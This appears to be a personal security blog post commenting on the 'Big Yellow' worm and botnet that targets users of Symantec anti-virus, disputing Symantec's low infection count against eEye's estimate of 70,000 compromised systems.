It seems like it could be a more advanced unpacker then most of the lame ones I normally see. wait, i just ran through the code again and it’s lame. oh well. At least later I can figure out what it says decoded…

Two of my former employers have made the news again. “Big Yellow” is a new worm/bot-net discovered by eEye Digital Security which affects users of anti-virus from software maker Symantec. I’ve heard very recently one analyst say that “anti virus is dead” but I don’t think this is what he had in mind. The fact is that Symantec products dominate the IT landscape and most of the home market as well. Anti Virus is still an integrated part of the Operating System. So much so that even Microsoft has dragged themselves into the marketplace. However we see in Big Yellow one of the most effective styles of attack out there. Like the ASN.1 vulnerability this only affects users who are “secured”.

Users who run anti virus pay a “tax” in the form of lost resources. processor, memory, disk access are all used by the anti virus programs to compute file signatures and match them against an ever growing signature database. End users consider this tax worthwhile since they can remain safe. This new threat however will only infect the users of Symantec’s anti virus thus putting them in greater danger then someone who isn’t using any anti virus at all or free alternatives like ClamAV and AntiVir. Seems ironic really.

What makes this worse is that Symantec doesn’t seem to have a good handle on what is really going on. Vincent Weafer, senior director with Symantec Security Response states, “We have had three submissions locally from our customers.” eEye “has counted about 70,000 compromised systems”. Counting infections is really easy to do if one is sitting on the botnet itself. And with 70,000 zombies all idling in the channel it is pretty easy to hide out and watch new infected computers roll in. I did this myself for Elf.Kaiten.Q and the numbers I counted were significantly higher then any AV vendor reported. Even the Internet Storm Center shows significant numbers for this threat.

This compounds the danger since Symantec will diminish their response if they don’t belive a real threat exists. A threat which eEye has sufficiently pointed out. 70,000 nodes in a botnet can accomplish a lot of bad things including but not limited to spamming operations, distributed denial of service, or even identity theft.